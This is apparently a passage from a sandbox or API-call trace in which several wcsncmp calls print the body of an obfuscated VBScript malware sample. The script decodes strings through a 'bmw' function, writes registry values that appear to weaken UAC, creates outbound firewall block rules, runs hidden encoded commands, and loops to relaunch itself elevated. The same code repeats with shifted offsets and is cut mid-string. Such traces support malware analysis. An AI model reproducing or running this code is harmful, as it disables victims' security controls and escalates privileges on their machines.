bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.338] wcsncmp (_String1="CV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.338] wcsncmp (_String1="V\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0226.338] wcsncmp (_String1="\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.338] wcsncmp (_String1="))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.338] wcsncmp (_String1=")\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 